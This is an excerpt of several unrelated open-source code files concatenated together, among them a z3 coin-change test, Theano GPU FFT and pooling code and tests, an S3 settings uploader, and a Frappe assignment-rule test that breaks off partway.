wow_the_second_coming = big_dict.search("foothill")
self.assertEqual(wow_the_second_coming[0].data.word, "foothill")
self.assertEqual(wow_the_second_coming[1], DictionarySource.CACHE)
``` |
{
"source": "JimmyQuenichet/z3",
"score": 3
} |
#### File: practice/least_change/least_change_test.py
```python
import unittest
from z3 import *
from least_change import (
least_change,
)
# Tests adapted from https://github.com/exercism/python/blob/main/exercises/practice/change/change_test.py
class ChangeTest(unittest.TestCase):
def test_single_coin_change(self):
self.assertEqual(str(least_change([1, 5, 10, 25, 100], 25)), "[10 = 0, 25 = 1, 100 = 0, 5 = 0, min_coins = 1, "
"1 = 0]")
def test_multiple_coin_change(self):
self.assertEqual(str(least_change([1, 5, 10, 25, 100], 15)), "[10 = 1, 25 = 0, 100 = 0, 5 = 1, min_coins = 2, 1 = 0]")
def test_change_with_lilliputian_coins(self):
self.assertEqual(str(least_change([1, 4, 15, 20, 50], 23)), "[15 = 1, 4 = 2, 20 = 0, 50 = 0, min_coins = 3, "
"1 = 0]")
def test_change_with_lower_elbonia_coins(self):
self.assertEqual(str(least_change([1, 5, 10, 21, 25], 63)), "[5 = 0, 21 = 3, 25 = 0, 10 = 0, min_coins = 3, "
"1 = 0]")
def test_large_target_values(self):
self.assertEqual(str(least_change([1, 2, 5, 10, 20, 50, 100], 999)).replace('\n', ''), "[5 = 1, 50 = 1, 100 = "
"9, 2 = 2, 20 = 2, "
"10 = 0, min_coins = "
"15, 1 = 0]")
def test_possible_change_without_unit_coins_available(self):
self.assertEqual(str(least_change([2, 5, 10, 20, 50], 21)), "[10 = 1, 50 = 0, 2 = 3, 20 = 0, 5 = 1, min_coins "
"= 5]")
def test_another_possible_change_without_unit_coins_available(self):
self.assertEqual(str(least_change([4, 5], 27)), "[4 = 3, 5 = 3, min_coins = 6]")
def test_no_coins_make_0_change(self):
self.assertEqual(least_change([1, 5, 10, 21, 25], 0), None)
def test_for_change_smaller_than_the_smallest_of_coins(self):
self.assertEqual(least_change([5, 10], 3), None)
def test_if_no_combination_can_add_up_to_target(self):
self.assertEqual(least_change([5, 10], 94), None)
def test_cannot_find_negative_change_values(self):
self.assertEqual(least_change([1, 2, 5], -5), None)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jimmyren23/minimax-fair",
"score": 3
} |
#### File: minimax-fair/src/write_params_to_file.py
```python
import os
def write_params_to_os(dirname, params_list):
# make dir if it doesn't exist
if not os.path.isdir(dirname):
print(f'making directory: {dirname}')
os.makedirs(dirname)
final_path = os.path.join(dirname, 'settings.txt')
with open(final_path, 'w') as f:
for item in params_list:
f.write(f'{item}\n')
def write_params_to_s3(params_list, bucket_name, dirname, ACCESS_KEY, SECRET_KEY):
# These are none when credentials file doesn't exist, or is set to ''. Shift off text credentials with AWS batch
if ACCESS_KEY is not None and SECRET_KEY is not None:
# Authenticate AWS session and create bucket object
try:
session = boto3.Session(
aws_access_key_id=ACCESS_KEY,
aws_secret_access_key=SECRET_KEY,
)
s3 = session.resource('s3')
except botocore.exceptions.ClientError:
s3 = boto3.resource('s3')
else:
s3 = boto3.resource('s3')
# Create content string
content = ''
for item in params_list:
content += f'{item}\n'
# Write content string directly to file
s3.Object(bucket_name, dirname + '/settings.txt').put(Body=content)
print(f'Successfully uploaded settings file to s3 bucket {bucket_name}')
``` |
{
"source": "JimmyRetza/Theano",
"score": 2
} |
#### File: theano/gpuarray/fft.py
```python
from __future__ import absolute_import, print_function, division
import numpy as np
import theano
from theano import Op
import theano.tensor as T
from theano.gradient import DisconnectedType
from .basic_ops import (gpu_contiguous, as_gpuarray_variable,
infer_context_name)
from .type import GpuArrayType
import theano.tensor.fft
from .opt import register_opt, op_lifter, register_opt2
try:
import pygpu
pygpu_available = True
except ImportError:
pygpu_available = False
try:
import pycuda.driver
pycuda_available = True
except ImportError:
pycuda_available = False
try:
import skcuda
from skcuda import fft
skcuda_available = True
except (ImportError, Exception):
skcuda_available = False
class CuRFFTOp(Op):
__props__ = ()
def output_type(self, inp):
# add one extra dim for real/imag
return GpuArrayType(inp.dtype,
broadcastable=[False] * (inp.type.ndim + 1),
context_name=inp.type.context_name)
def make_node(self, inp, s=None):
# A shape parameter s can be provided as an input. For now this is used to
# manage odd transform sizes.
# Later this could be extended to handle padding and trunkation,
# following numpy's interface. However, cuFFT expects array that match
# the shape given to the plan, so padding will have to be done in the op.
# The effect of padding on gradients has yet to be investigated.
if not skcuda_available:
raise RuntimeError("skcuda is needed for CuFFTOp")
if not pygpu_available:
raise RuntimeError("pygpu is needed for CuFFTOp")
if not pycuda_available:
raise RuntimeError("pycuda is needed for CuFFTOp")
inp = gpu_contiguous(as_gpuarray_variable(inp,
infer_context_name(inp)))
# If no shape is provided as input, default to input data shape.
if s is None:
s = inp.shape[1:]
s = T.as_tensor_variable(s)
assert inp.dtype == "float32"
assert s.ndim == 1
assert s.dtype in theano.tensor.integer_dtypes
return theano.Apply(self, [inp, s], [self.output_type(inp)()])
def make_thunk(self, node, storage_map, _, _2, impl=None):
inputs = [storage_map[v] for v in node.inputs]
outputs = [storage_map[v] for v in node.outputs]
# Initiliaze cuda context to the input's.
with node.inputs[0].type.context:
skcuda.misc.init()
plan_input_shape = [None]
plan = [None]
def thunk():
input_shape = inputs[0][0].shape
s = inputs[1][0]
# Since padding is not supported, assert s matches input shape.
assert (input_shape[1:] == s).all()
# construct output shape
output_shape = [input_shape[0]] + list(s)
# DFT of real input is symmetric, no need to store
# redundant coefficients
output_shape[-1] = output_shape[-1] // 2 + 1
# extra dimension with length 2 for real/imag
output_shape += [2]
output_shape = tuple(output_shape)
z = outputs[0]
# only allocate if there is no previous allocation of the
# right size.
if z[0] is None or z[0].shape != output_shape:
z[0] = pygpu.zeros(output_shape, context=inputs[0][0].context,
dtype='float32')
input_pycuda = inputs[0][0]
# I thought we'd need to change the type on output_pycuda
# so it is complex64, but as it turns out skcuda.fft
# doesn't really care either way and treats the array as
# if it is complex64 anyway.
output_pycuda = z[0]
with input_pycuda.context:
# only initialise plan if necessary
if plan[0] is None or plan_input_shape[0] != input_shape:
plan_input_shape[0] = input_shape
plan[0] = fft.Plan(s, np.float32, np.complex64,
batch=input_shape[0])
# Sync GPU variables before computation
input_pycuda.sync()
output_pycuda.sync()
fft.fft(input_pycuda, output_pycuda, plan[0])
# Sync results to ensure output contains completed computation
pycuda.driver.Context.synchronize()
thunk.inputs = inputs
thunk.outputs = outputs
thunk.lazy = False
return thunk
def grad(self, inputs, output_grads):
gout, = output_grads
s = inputs[1]
# Divide the last dimension of the output gradients by 2, they are
# double-counted by the real-IFFT due to symmetry, except the first
# and last elements (for even transforms) which are unique.
idx = [slice(None)] * (gout.ndim - 2) \
+ [slice(1, (s[-1] // 2) + (s[-1] % 2))] + [slice(None)]
gout = T.set_subtensor(gout[idx], gout[idx] * 0.5)
return [cuirfft_op(gout, s), DisconnectedType()()]
def connection_pattern(self, node):
# Specificy that shape input parameter has no connection to graph and gradients.
return [[True], [False]]
curfft_op = CuRFFTOp()
class CuIRFFTOp(Op):
__props__ = ()
def output_type(self, inp):
# remove extra dim for real/imag
return GpuArrayType(inp.dtype,
broadcastable=[False] * (inp.type.ndim - 1),
context_name=inp.type.context_name)
def make_node(self, inp, s=None):
# A shape parameter is expected as an input. For now this is used to
# manage odd transform sizes.
# Later this could be extended to handle padding and trunkation,
# following numpy's interface. However, cuFFT expects array that match
# the shape given to the plan, so padding will have to be done in the op.
# The effect of padding on gradients has yet to be investigated.
if not skcuda_available:
raise RuntimeError("skcuda is needed for CuIFFTOp")
if not pygpu_available:
raise RuntimeError("pygpu is needed for CuIFFTOp")
if not pycuda_available:
raise RuntimeError("pycuda is needed for CuIFFTOp")
inp = gpu_contiguous(as_gpuarray_variable(inp,
infer_context_name(inp)))
# If no shape is provided as input, calculate shape assuming even real transform.
if s is None:
s = inp.shape[1:-1]
s = T.set_subtensor(s[-1], (s[-1] - 1) * 2)
s = T.as_tensor_variable(s)
assert inp.dtype == "float32"
assert s.ndim == 1
return theano.Apply(self, [inp, s], [self.output_type(inp)()])
def make_thunk(self, node, storage_map, _, _2, impl=None):
inputs = [storage_map[v] for v in node.inputs]
outputs = [storage_map[v] for v in node.outputs]
# Initiliaze cuda context to the input's.
with node.inputs[0].type.context:
skcuda.misc.init()
plan_input_shape = [None]
plan = [None]
def thunk():
input_shape = inputs[0][0].shape
s = inputs[1][0]
# Since padding is not supported, assert that last dimension corresponds to
# input forward transform size.
assert (input_shape[1:-2] == s[:-1]).all()
assert ((input_shape[-2] - 1) * 2 + s[-1] % 2 == s[-1]).all()
# construct output shape
# chop off the extra length-2 dimension for real/imag
output_shape = [input_shape[0]] + list(s)
output_shape = tuple(output_shape)
z = outputs[0]
# only allocate if there is no previous allocation of the
# right size.
if z[0] is None or z[0].shape != output_shape:
z[0] = pygpu.zeros(output_shape, context=inputs[0][0].context,
dtype='float32')
input_pycuda = inputs[0][0]
# input_pycuda is a float32 array with an extra dimension,
# but will be interpreted by skcuda as a complex64
# array instead.
output_pycuda = z[0]
with input_pycuda.context:
# only initialise plan if necessary
if plan[0] is None or plan_input_shape[0] != input_shape:
plan_input_shape[0] = input_shape
plan[0] = fft.Plan(s, np.complex64, np.float32,
batch=output_shape[0])
# Sync GPU variables before computation
input_pycuda.sync()
output_pycuda.sync()
fft.ifft(input_pycuda, output_pycuda, plan[0])
# strangely enough, enabling rescaling here makes it run
# very, very slowly, so do this rescaling manually
# afterwards!
# Sync results to ensure output contains completed computation
pycuda.driver.Context.synchronize()
thunk.inputs = inputs
thunk.outputs = outputs
thunk.lazy = False
return thunk
def grad(self, inputs, output_grads):
gout, = output_grads
s = inputs[1]
gf = curfft_op(gout, s)
# Multiply the last dimension of the gradient by 2, they represent
# both positive and negative frequencies, except the first
# and last elements (for even transforms) which are unique.
idx = [slice(None)] * (gf.ndim - 2) \
+ [slice(1, (s[-1] // 2) + (s[-1] % 2))] + [slice(None)]
gf = T.set_subtensor(gf[idx], gf[idx] * 2)
return [gf, DisconnectedType()()]
def connection_pattern(self, node):
# Specificy that shape input parameter has no connection to graph and gradients.
return [[True], [False]]
cuirfft_op = CuIRFFTOp()
def curfft(inp, norm=None):
"""
Performs the fast Fourier transform of a real-valued input on the GPU.
The input must be a real-valued float32 variable of dimensions (m, ..., n).
It performs FFTs of size (..., n) on m batches.
The output is a GpuArray of dimensions (m, ..., n//2+1, 2). The second to
last dimension of the output contains the n//2+1 non-trivial elements of
the real-valued FFTs. The real and imaginary parts are stored as a pair of
float32 arrays.
Parameters
----------
inp
Array of real-valued float32 of size (m, ..., n), containing m inputs of
size (..., n).
norm : {None, 'ortho', 'no_norm'}
Normalization of transform. Following numpy, default *None* normalizes
only the inverse transform by n, 'ortho' yields the unitary transform
(:math:`1/\sqrt n` forward and inverse). In addition, 'no_norm' leaves
the transform unnormalized.
"""
s = inp.shape[1:]
cond_norm = _unitary(norm)
scaling = 1
if cond_norm == "ortho":
scaling = T.sqrt(s.prod().astype('float32'))
return curfft_op(inp, s) / scaling
def cuirfft(inp, norm=None, is_odd=False):
"""
Performs the inverse fast Fourier Transform with real-valued output on the GPU.
The input is a variable of dimensions (m, ..., n//2+1, 2) with
type float32 representing the non-trivial elements of m
real-valued Fourier transforms of initial size (..., n). The real and
imaginary parts are stored as a pair of float32 arrays.
The output is a real-valued float32 variable of dimensions (m, ..., n)
giving the m inverse FFTs.
Parameters
----------
inp
Array of float32 of size (m, ..., n//2+1, 2), containing m inputs
with n//2+1 non-trivial elements on the last dimension and real
and imaginary parts stored as separate arrays.
norm : {None, 'ortho', 'no_norm'}
Normalization of transform. Following numpy, default *None* normalizes
only the inverse transform by n, 'ortho' yields the unitary transform
(:math:`1/\sqrt n` forward and inverse). In addition, 'no_norm' leaves
the transform unnormalized.
is_odd : {True, False}
Set to True to get a real inverse transform output with an odd last dimension
of length (N-1)*2 + 1 for an input last dimension of length N.
"""
if is_odd not in (True, False):
raise ValueError("Invalid value %s for id_odd, must be True or False" % is_odd)
s = inp.shape[1:-1]
if is_odd:
s = T.set_subtensor(s[-1], (s[-1] - 1) * 2 + 1)
else:
s = T.set_subtensor(s[-1], (s[-1] - 1) * 2)
cond_norm = _unitary(norm)
scaling = 1
if cond_norm is None:
scaling = s.prod().astype('float32')
elif cond_norm == "ortho":
scaling = T.sqrt(s.prod().astype('float32'))
return cuirfft_op(inp, s) / scaling
def _unitary(norm):
if norm not in (None, "ortho", "no_norm"):
raise ValueError("Invalid value %s for norm, must be None, 'ortho' or "
"'no norm'" % norm)
return norm
if skcuda_available:
@register_opt('fast_compile')
@op_lifter([theano.tensor.fft.RFFTOp])
@register_opt2([theano.tensor.fft.RFFTOp], 'fast_compile')
def local_gpua_curfft_op(op, ctx_name, inputs, outputs):
return curfft_op
@register_opt('fast_compile')
@op_lifter([theano.tensor.fft.IRFFTOp])
@register_opt2([theano.tensor.fft.IRFFTOp], 'fast_compile')
def local_gpua_cuirfft_op(op, ctx_name, inputs, outputs):
return cuirfft_op
```
#### File: theano/gpuarray/fp16_help.py
```python
from __future__ import absolute_import, print_function, division
def work_dtype(dtype):
"""
Return the data type for working memory.
"""
if dtype == 'float16':
return 'float32'
else:
return dtype
def load_w(dtype):
"""
Return the function name to load data.
This should be used like this::
code = '%s(ival)' % (load_w(input_type),)
"""
if dtype == 'float16':
return 'ga_half2float'
else:
return ''
def write_w(dtype):
"""
Return the function name to write data.
This should be used like this::
code = 'res = %s(oval)' % (write_w(output_type),)
"""
if dtype == 'float16':
return 'ga_float2half'
else:
return ''
```
#### File: gpuarray/tests/test_pool.py
```python
from __future__ import absolute_import, print_function, division
import unittest
import copy
import itertools
import numpy as np
import theano
from theano import gradient
from theano import tensor
from theano.tensor.signal.pool import (Pool, MaxPoolGrad, AveragePoolGrad,
DownsampleFactorMaxGradGrad)
from theano.tests import unittest_tools as utt
from .config import mode_with_gpu, mode_without_gpu
from .test_basic_ops import rand
from ..pool import (GpuPool, GpuMaxPoolGrad, GpuAveragePoolGrad,
GpuDownsampleFactorMaxGradGrad)
class TestPool(unittest.TestCase):
def test_pool_py_interface(self):
shp = (2, 2, 2, 2)
inp = theano.shared(rand(*shp), 'a')
inp = tensor.as_tensor_variable(inp)
with self.assertRaises(ValueError):
# test when pad >= ws
ds_op = GpuPool(ignore_border=True, ndim=2)
ds_op(inp, [2, 2], pad=[3, 3])
with self.assertRaises(ValueError):
# test when ignore_border and pad >= 0
ds_op = GpuPool(ignore_border=False, ndim=2)
ds_op(inp, [2, 2], pad=[1, 1])
def test_pool_c_interface(self):
gpu_mode = mode_with_gpu.excluding("cudnn")
gpu_mode.check_py_code = False
shp = (2, 2, 2, 2)
inp = theano.shared(rand(*shp), 'a')
inp = tensor.as_tensor_variable(inp)
with self.assertRaises(ValueError):
# test when ignore_border and pad >= 0
ds_op = GpuPool(ignore_border=False, ndim=2)
pad = tensor.as_tensor_variable([1, 1])
f = theano.function([], ds_op(inp, [2, 2], pad=pad), mode=gpu_mode)
f()
def test_pool_big_ws(self):
gpu_mode = mode_with_gpu.excluding("cudnn")
gpu_mode.check_py_code = False
shp = (2, 2, 2, 2)
inp = theano.shared(rand(*shp), 'a')
inp = tensor.as_tensor_variable(inp)
ds_op = GpuPool(ignore_border=False, mode='average_exc_pad', ndim=2)
pad = tensor.as_tensor_variable([0, 0])
f = theano.function([], ds_op(inp, [5, 5], stride=[1, 1], pad=pad),
mode=gpu_mode)
f()
def test_pool2d():
shps = [(1, 12),
(1, 1, 12),
(1, 1, 1, 12),
(1, 1, 2, 2),
(1, 1, 1, 1),
(1, 1, 4, 4),
(1, 1, 10, 11),
(1, 2, 2, 2),
(3, 5, 4, 4),
(25, 1, 7, 7),
(1, 1, 12, 12),
(1, 1, 2, 14),
(1, 1, 12, 14),
(1, 1, 14, 14),
(1, 1, 16, 16),
(1, 1, 18, 18),
(1, 1, 24, 24),
(1, 6, 24, 24),
(10, 1, 24, 24),
(10, 6, 24, 24),
(30, 6, 12, 12),
(30, 2, 24, 24),
(30, 6, 24, 24),
(10, 10, 10, 11),
(1, 1, 10, 1025),
(1, 1, 10, 1023),
(1, 1, 1025, 10),
(1, 1, 1023, 10),
(3, 2, 16, 16, 16),
(3, 2, 6, 6, 6, 5),
(3, 2, 6, 6, 6, 5, 7), ]
np.random.RandomState(utt.fetch_seed()).shuffle(shps)
test_ws = (2, 2), (3, 2), (1, 1)
test_st = (2, 2), (3, 2), (1, 1)
test_mode = ['max', 'sum', 'average_inc_pad', 'average_exc_pad']
ref_mode = copy.copy(mode_without_gpu)
ref_mode.check_py_code = False
gpu_mode = mode_with_gpu.excluding("cudnn")
gpu_mode.check_py_code = False
for shp in shps:
for mode, ws, st in itertools.product(test_mode, test_ws, test_st):
if ws[0] > shp[-2] or ws[1] > shp[-1]:
continue
for ignore_border, pad in zip((True, False), [(1, 1), (0, 0)]):
if pad[0] >= ws[0] or pad[1] >= ws[1]:
continue
if mode == 'average_exc_pad' and (pad[0] > 0 or pad[1] > 0):
continue
# print('test_pool2d', shp, ws, st, pad, mode, ignore_border)
ds_op = Pool(ndim=len(ws), mode=mode, ignore_border=ignore_border)
a = theano.shared(rand(*shp), 'a')
a_pooled = ds_op(tensor.as_tensor_variable(a), ws, st, pad)
f = theano.function([], a_pooled, mode=gpu_mode)
f2 = theano.function([], a_pooled, mode=ref_mode)
assert any([isinstance(node.op, GpuPool)
for node in f.maker.fgraph.toposort()])
assert any([isinstance(node.op, Pool)
for node in f2.maker.fgraph.toposort()])
assert np.allclose(f(), f2()), (shp, ws, st, pad, mode, ignore_border)
a_pooled_grad = tensor.grad(a_pooled.sum(), a)
g = theano.function([], a_pooled_grad, mode=gpu_mode)
g2 = theano.function([], a_pooled_grad, mode=ref_mode)
if mode == 'max':
gop = GpuMaxPoolGrad
gop2 = MaxPoolGrad
else:
gop = GpuAveragePoolGrad
gop2 = AveragePoolGrad
assert any([isinstance(node.op, gop)
for node in g.maker.fgraph.toposort()])
assert any([isinstance(node.op, gop2)
for node in g2.maker.fgraph.toposort()])
assert np.allclose(g(), g2()), (shp, ws, st, pad, mode, ignore_border)
# test rop and grad grad for max pooling
# for average pooling grad grad is just average pooling grad
if mode != 'max':
continue
ea = theano.shared(rand(*shp), 'ea')
gr = theano.function([], tensor.Rop(a_pooled, a, ea), mode=gpu_mode)
gr2 = theano.function([], tensor.Rop(a_pooled, a, ea), mode=ref_mode)
assert any([
isinstance(node.op, GpuDownsampleFactorMaxGradGrad)
for node in gr.maker.fgraph.toposort()
])
assert any([
isinstance(node.op, DownsampleFactorMaxGradGrad)
for node in gr2.maker.fgraph.toposort()
])
assert np.allclose(gr(), gr2()), (shp, ws, st, pad, mode, ignore_border)
ggf = gradient.Lop(tensor.grad((a_pooled**2).sum(), a), a, a)
gg = theano.function([], ggf, mode=gpu_mode)
gg2 = theano.function([], ggf, mode=ref_mode)
assert any([
isinstance(node.op, GpuDownsampleFactorMaxGradGrad)
for node in gg.maker.fgraph.toposort()
])
assert any([
isinstance(node.op, DownsampleFactorMaxGradGrad)
for node in gg2.maker.fgraph.toposort()
])
assert np.allclose(gg(), gg2()), (shp, ws, st, pad, mode, ignore_border)
def test_pool3d():
shps = [(1, 1, 12),
(1, 1, 1, 1, 1),
(1, 1, 1, 1, 1025),
(1, 1, 2, 2, 2),
(1, 1, 7, 7, 7),
(1, 1, 9, 10, 11),
(1, 6, 18, 18, 18),
(1, 1, 6, 24, 24),
(1, 10, 1, 24, 24),
(1, 10, 6, 24, 24),
(1, 30, 6, 12, 12),
(1, 30, 2, 24, 24),
(1, 30, 6, 24, 24),
(1, 10, 10, 10, 11),
(1, 1, 10, 10, 1025),
(1, 1, 10, 10, 1023),
(1, 1, 10, 1025, 10),
(1, 1, 10, 1023, 10),
(3, 2, 6, 6, 6, 5),
(3, 2, 6, 6, 6, 5, 7), ]
np.random.RandomState(utt.fetch_seed()).shuffle(shps)
test_ws = (2, 2, 2), (3, 2, 3), (1, 1, 1)
test_st = (2, 2, 2), (2, 3, 2), (1, 1, 1)
test_mode = ['max', 'sum', 'average_inc_pad', 'average_exc_pad']
ref_mode = copy.copy(mode_without_gpu)
ref_mode.check_py_code = False
gpu_mode = mode_with_gpu.excluding("cudnn")
gpu_mode.check_py_code = False
for shp in shps:
for mode, ws, st in itertools.product(test_mode, test_ws, test_st):
if ws[0] > shp[-3] or ws[1] > shp[-2] or ws[2] > shp[-1]:
continue
for ignore_border, pad in zip((True, False), [(1, 1, 1), (0, 0, 0)]):
if pad[0] >= ws[0] or pad[1] >= ws[1] or pad[2] >= ws[2]:
continue
if mode == 'average_exc_pad' and (pad[0] > 0 or pad[1] > 0 or pad[2] > 0):
continue
# print('test_pool3d', shp, ws, st, pad, mode, ignore_border)
ds_op = Pool(ndim=len(ws), mode=mode, ignore_border=ignore_border)
a = theano.shared(rand(*shp), 'a')
a_pooled = ds_op(tensor.as_tensor_variable(a), ws, st, pad)
f = theano.function([], a_pooled, mode=gpu_mode)
f2 = theano.function([], a_pooled, mode=ref_mode)
assert any([isinstance(node.op, GpuPool)
for node in f.maker.fgraph.toposort()])
assert any([isinstance(node.op, Pool)
for node in f2.maker.fgraph.toposort()])
assert np.allclose(f(), f2()), (shp, ws, st, pad, mode, ignore_border)
a_pooled_grad = tensor.grad(a_pooled.sum(), a)
g = theano.function([], a_pooled_grad, mode=gpu_mode)
g2 = theano.function([], a_pooled_grad, mode=ref_mode)
if mode == 'max':
gop = GpuMaxPoolGrad
gop2 = MaxPoolGrad
else:
gop = GpuAveragePoolGrad
gop2 = AveragePoolGrad
assert any([isinstance(node.op, gop)
for node in g.maker.fgraph.toposort()])
assert any([isinstance(node.op, gop2)
for node in g2.maker.fgraph.toposort()])
assert np.allclose(g(), g2()), (shp, ws, st, pad, mode, ignore_border)
# test rop and grad grad for max pooling
# for average pooling grad grad is just average pooling grad
if mode != 'max':
continue
ea = theano.shared(rand(*shp), 'ea')
gr = theano.function([], tensor.Rop(a_pooled, a, ea), mode=gpu_mode)
gr2 = theano.function([], tensor.Rop(a_pooled, a, ea), mode=ref_mode)
assert any([
isinstance(node.op, GpuDownsampleFactorMaxGradGrad)
for node in gr.maker.fgraph.toposort()
])
assert any([
isinstance(node.op, DownsampleFactorMaxGradGrad)
for node in gr2.maker.fgraph.toposort()
])
assert np.allclose(gr(), gr2()), (shp, ws, st, pad, mode, ignore_border)
ggf = gradient.Lop(tensor.grad((a_pooled**2).sum(), a), a, a)
gg = theano.function([], ggf, mode=gpu_mode)
gg2 = theano.function([], ggf, mode=ref_mode)
assert any([
isinstance(node.op, GpuDownsampleFactorMaxGradGrad)
for node in gg.maker.fgraph.toposort()
])
assert any([
isinstance(node.op, DownsampleFactorMaxGradGrad)
for node in gg2.maker.fgraph.toposort()
])
assert np.allclose(gg(), gg2()), (shp, ws, st, pad, mode, ignore_border)
```
#### File: theano/misc/may_share_memory.py
```python
from __future__ import absolute_import, print_function, division
import numpy as np
from theano.tensor.basic import TensorType
try:
import scipy.sparse
from theano.sparse.basic import SparseType
def _is_sparse(a):
return scipy.sparse.issparse(a)
except ImportError:
# scipy not imported, their can be only ndarray and gpuarray
def _is_sparse(a):
return False
from theano import gpuarray
if gpuarray.pygpu:
def _is_gpua(a):
return isinstance(a, gpuarray.pygpu.gpuarray.GpuArray)
else:
def _is_gpua(a):
return False
__docformat__ = "restructuredtext en"
def may_share_memory(a, b, raise_other_type=True):
a_ndarray = isinstance(a, np.ndarray)
b_ndarray = isinstance(b, np.ndarray)
if a_ndarray and b_ndarray:
return TensorType.may_share_memory(a, b)
a_gpua = _is_gpua(a)
b_gpua = _is_gpua(b)
if a_gpua and b_gpua:
return gpuarray.pygpu.gpuarray.may_share_memory(a, b)
a_sparse = _is_sparse(a)
b_sparse = _is_sparse(b)
if (not(a_ndarray or a_sparse or a_gpua) or
not(b_ndarray or b_sparse or b_gpua)):
if raise_other_type:
raise TypeError("may_share_memory support only ndarray"
" and scipy.sparse or GpuArray type")
return False
if a_gpua or b_gpua:
return False
return SparseType.may_share_memory(a, b)
```
#### File: theano/tensor/inc_code.py
```python
from __future__ import absolute_import, print_function, division
def inc_code():
types = ['npy_' + t for t in ['int8', 'int16', 'int32', 'int64',
'uint8', 'uint16', 'uint32', 'uint64',
'float16', 'float32', 'float64']]
complex_types = ['npy_' + t for t in ['complex32', 'complex64',
'complex128']]
inplace_map_template = """
#if defined(%(typen)s)
static void %(type)s_inplace_add(PyArrayMapIterObject *mit,
PyArrayIterObject *it, int inc_or_set)
{
int index = mit->size;
while (index--) {
%(op)s
PyArray_MapIterNext(mit);
PyArray_ITER_NEXT(it);
}
}
#endif
"""
floatadd = ("((%(type)s*)mit->dataptr)[0] = "
"(inc_or_set ? ((%(type)s*)mit->dataptr)[0] : 0)"
" + ((%(type)s*)it->dataptr)[0];")
complexadd = """
((%(type)s*)mit->dataptr)[0].real =
(inc_or_set ? ((%(type)s*)mit->dataptr)[0].real : 0)
+ ((%(type)s*)it->dataptr)[0].real;
((%(type)s*)mit->dataptr)[0].imag =
(inc_or_set ? ((%(type)s*)mit->dataptr)[0].imag : 0)
+ ((%(type)s*)it->dataptr)[0].imag;
"""
fns = ''.join([inplace_map_template % {'type': t, 'typen': t.upper(),
'op': floatadd % {'type': t}}
for t in types] +
[inplace_map_template % {'type': t, 'typen': t.upper(),
'op': complexadd % {'type': t}}
for t in complex_types])
def gen_binop(type, typen):
return """
#if defined(%(typen)s)
%(type)s_inplace_add,
#endif
""" % dict(type=type, typen=typen)
fn_array = ("static inplace_map_binop addition_funcs[] = {" +
''.join([gen_binop(type=t, typen=t.upper())
for t in types + complex_types]) + "NULL};\n")
def gen_num(typen):
return """
#if defined(%(typen)s)
%(typen)s,
#endif
""" % dict(type=type, typen=typen)
type_number_array = ("static int type_numbers[] = {" +
''.join([gen_num(typen=t.upper())
for t in types + complex_types]) + "-1000};")
code = ("""
typedef void (*inplace_map_binop)(PyArrayMapIterObject *,
PyArrayIterObject *, int inc_or_set);
""" + fns + fn_array + type_number_array + """
static int
map_increment(PyArrayMapIterObject *mit, PyArrayObject *op,
inplace_map_binop add_inplace, int inc_or_set)
{
PyArrayObject *arr = NULL;
PyArrayIterObject *it;
PyArray_Descr *descr;
if (mit->ait == NULL) {
return -1;
}
descr = PyArray_DESCR(mit->ait->ao);
Py_INCREF(descr);
arr = (PyArrayObject *)PyArray_FromAny((PyObject *)op, descr,
0, 0, NPY_ARRAY_FORCECAST, NULL);
if (arr == NULL) {
return -1;
}
if ((mit->subspace != NULL) && (mit->consec)) {
PyArray_MapIterSwapAxes(mit, (PyArrayObject **)&arr, 0);
if (arr == NULL) {
return -1;
}
}
it = (PyArrayIterObject*)
PyArray_BroadcastToShape((PyObject*)arr, mit->dimensions, mit->nd);
if (it == NULL) {
Py_DECREF(arr);
return -1;
}
(*add_inplace)(mit, it, inc_or_set);
Py_DECREF(arr);
Py_DECREF(it);
return 0;
}
static int
inplace_increment(PyArrayObject *a, PyObject *index, PyArrayObject *inc,
int inc_or_set)
{
inplace_map_binop add_inplace = NULL;
int type_number = -1;
int i = 0;
PyArrayMapIterObject * mit;
if (PyArray_FailUnlessWriteable(a, "input/output array") < 0) {
return -1;
}
if (PyArray_NDIM(a) == 0) {
PyErr_SetString(PyExc_IndexError, "0-d arrays can't be indexed.");
return -1;
}
type_number = PyArray_TYPE(a);
while (type_numbers[i] >= 0 && addition_funcs[i] != NULL){
if (type_number == type_numbers[i]) {
add_inplace = addition_funcs[i];
break;
}
i++ ;
}
if (add_inplace == NULL) {
PyErr_SetString(PyExc_TypeError, "unsupported type for a");
return -1;
}
mit = (PyArrayMapIterObject *) PyArray_MapIterArray(a, index);
if (mit == NULL) {
goto fail;
}
if (map_increment(mit, inc, add_inplace, inc_or_set) != 0) {
goto fail;
}
Py_DECREF(mit);
Py_INCREF(Py_None);
return 0;
fail:
Py_XDECREF(mit);
return -1;
}
""")
return code
``` |
{
"source": "jimmyrianto/frappe",
"score": 2
} |
#### File: doctype/assignment_rule/test_assignment_rule.py
```python
from __future__ import unicode_literals
import frappe
import unittest
from frappe.utils import random_string
from frappe.test_runner import make_test_records
class TestAutoAssign(unittest.TestCase):
def setUp(self):
make_test_records("User")
days = [
dict(day = 'Sunday'),
dict(day = 'Monday'),
dict(day = 'Tuesday'),
dict(day = 'Wednesday'),
dict(day = 'Thursday'),
dict(day = 'Friday'),
dict(day = 'Saturday'),
]
self.assignment_rule = get_assignment_rule([days, days])
clear_assignments()
def test_round_robin(self):
note = make_note(dict(public=1))
# check if auto assigned to first user
self.assertEqual(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), '<EMAIL>')
note = make_note(dict(public=1))
# check if auto assigned to second user
self.assertEqual(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), '<EMAIL>')
clear_assignments()
note = make_note(dict(public=1))
# check if auto assigned to third user, even if
# previous assignments where closed
self.assertEqual(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), '<EMAIL>')
# check loop back to first user
note = make_note(dict(public=1))
self.assertEqual(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), '<EMAIL>')
def test_load_balancing(self):
self.assignment_rule.rule = 'Load Balancing'
self.assignment_rule.save()
for _ in range(30):
note = make_note(dict(public=1))
# check if each user has 10 assignments (?)
for user in ('<EMAIL>', '<EMAIL>', '<EMAIL>'):
self.assertEqual(len(frappe.get_all('ToDo', dict(owner = user, reference_type = 'Note'))), 10)
# clear 5 assignments for first user
# can't do a limit in "delete" since postgres does not support it
